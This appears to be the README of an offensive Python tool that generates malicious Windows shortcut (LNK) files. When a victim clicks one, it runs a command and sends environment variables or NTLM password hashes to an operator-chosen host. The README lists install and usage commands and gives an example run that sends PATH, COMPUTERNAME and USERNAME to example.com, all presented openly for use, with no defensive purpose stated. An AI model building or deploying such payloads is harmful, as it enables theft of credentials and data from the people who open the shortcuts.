LNK-Payload-Generator is a Python script that generates Windows shortcut files (LNK) with specific commands and configurations. These shortcuts can exfiltrate data or execute specific commands when clicked.
- Generate LNK files for both Windows and non-Windows systems
- Customize the command to execute upon clicking the shortcut
- Exfiltrate specified environment variables or NTLM password hashes
- Supports English, Russian, and Chinese languages
- Python 3.x
- For Windows:
pywin32module - For non-Windows:
pylnkmodule
-
Clone the repository:
git clone https://github.com/your-username/LNK-Payload-Generator.git cd LNK-Payload-Generator -
Install the required modules:
pip install -r requirements.txt
-
Run the script with the desired options:
python Lnk-Gen.py --lang <language> --host <host> --output <output.lnk> [--execute <command>] [--vars <variables>] [--type <type>]
-
Example:
python Lnk-Gen.py --lang en --host example.com --output payload.lnk --execute "notepad.exe" --vars "PATH,COMPUTERNAME,USERNAME" --type environment
--lang: Choose language: en, ru, zh--host: Where should we send our data?--output: The name of the lnk file--execute: Command to execute when the shortcut is clicked (default:C:\Windows\explorer.exe .)--vars: Variables to exfiltrate, e.g., "PATH,COMPUTERNAME,USERNAME,NUMBER_OF_PROCESSORS"--type: Payload type to generate (choices:environment,ntlm,all)
Detailed documentation is available in the docs folder.
This project is licensed under the MIT License - see the LICENSE file for details.
Contributions are welcome! Please read the CONTRIBUTING.md for guidelines.